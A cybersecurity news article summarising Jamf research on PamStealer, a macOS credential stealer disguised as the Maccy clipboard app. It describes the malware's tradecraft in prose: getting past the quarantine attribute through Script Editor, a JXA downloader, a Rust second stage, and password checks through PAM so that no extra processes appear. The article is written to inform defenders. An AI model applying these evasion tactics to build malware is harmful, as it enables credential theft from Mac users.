Cybersecurity

PamStealer: New macOS Malware Evades Detection with Stealthy Tactics

Researchers have identified "PamStealer," a new macOS malware that uses sophisticated techniques, including local password validation via Pluggable Authentication Modules (PAM), to steal credentials stealthily.

Joshua Ramos
Joshua Ramos covers cybersecurity for Techawave.
3 min read0 views
PamStealer: New macOS Malware Evades Detection with Stealthy Tactics
Share

A novel strain of malware targeting macOS, dubbed PamStealer, has been discovered by security researchers, employing a unique combination of stealthy tactics to pilfer user credentials. The sophisticated malware utilizes a two-stage infection process, with its initial distribution cleverly disguised as a legitimate clipboard manager application for Mac computers. Researchers at Jamf, a firm specializing in macOS security, detailed the malware's operations, highlighting its advanced methods that allow it to bypass common detection mechanisms.

PamStealer's name derives from its use of macOS's built-in Pluggable Authentication Modules (PAM) interface. This interface is leveraged by the malware to validate a user's login password locally before transmitting the compromised information to an attacker-controlled server. This local validation, a departure from typical malware behavior, contributes significantly to its ability to remain undetected.

The initial stage of the attack begins with a disk image masquerading as "Maccy," a popular clipboard management tool. Upon double-clicking this disk image, users are prompted to launch an AppleScript within the macOS Script Editor. This script, however, contains deeply embedded malicious functionality. Instead of relying on external command-line tools like `curl` or `zsh`, the AppleScript deploys a self-contained JavaScript for Automation (JXA) downloader. This downloader utilizes native Objective-C APIs to retrieve and prepare the second stage of the malware payload.

A Quieter Execution Chain for Maximum Stealth

This layered approach, combining a disk image lure with an AppleScript and further embedding the payload within a JXA downloader, represents a significant evolution in macOS malware delivery. "Rather than relying on shell commands such as curl or zsh, the AppleScript executes a self-contained JavaScript for Automation (JXA) downloader that retrieves and stages the payload using native Objective-C APIs," the Jamf researchers explained. "Combined with a Rust-based second stage and a password capture workflow that validates credentials locally through PAM, the result is a quieter execution chain than we typically observe in commodity macOS stealers."

A key tactic employed by PamStealer involves circumventing the `com.apple.quarantine` attribute. This macOS security feature typically warns users and imposes restrictions on executable files downloaded from the internet. However, by bundling the malicious code within an AppleScript and executing it directly via the Script Editor after a specific key command (Command-R), PamStealer can effectively bypass these warnings.

The second stage of the malware is a lean executable written in Rust, a less common language for macOS infostealers but one that offers performance and security advantages. This binary is designed to masquerade as legitimate macOS components, such as `Finder.app` or `Software Update.app`, and displays authentic macOS icons to further deceive the user. It operates by accessing SQLite database files directly to harvest information.

PamStealer's credential harvesting process is particularly insidious. It presents a native-looking password prompt, designed to mimic a legitimate system authorization request, stating, "Maccy wants to make changes. Enter your password to allow this." Crucially, this password prompt's validation occurs entirely through the PAM API. "This check is done entirely through PAM: there is no call out to dscl, security, osascript or any spawned process to verify the password, as many commodity macOS stealers do," the Jamf report noted. "The result is a quieter routine that keeps only a verified password, and one fewer process chain for defenders to detect on." If the initial password entry fails, the prompt reappears, subtly pressuring the user to enter the correct credentials. Upon successful validation, a deceptive message appears, claiming the file is damaged and cannot be installed, aiming to allay any suspicion.

Beyond password theft, PamStealer seeks to maximize the data it can exfiltrate. It may request Full Disk Access permissions for the fake Maccy application and contains code designed to access cryptocurrency accounts, such as Ethereum. The sophistication of this malware, from its delivery mechanism using native macOS scripting environments to its PAM-based local validation and multi-faceted data harvesting, underscores the ongoing evolution of threats targeting Mac users. The continuous adoption of quieter execution chains and native implementations by malware authors poses a persistent challenge for traditional detection methods.

Share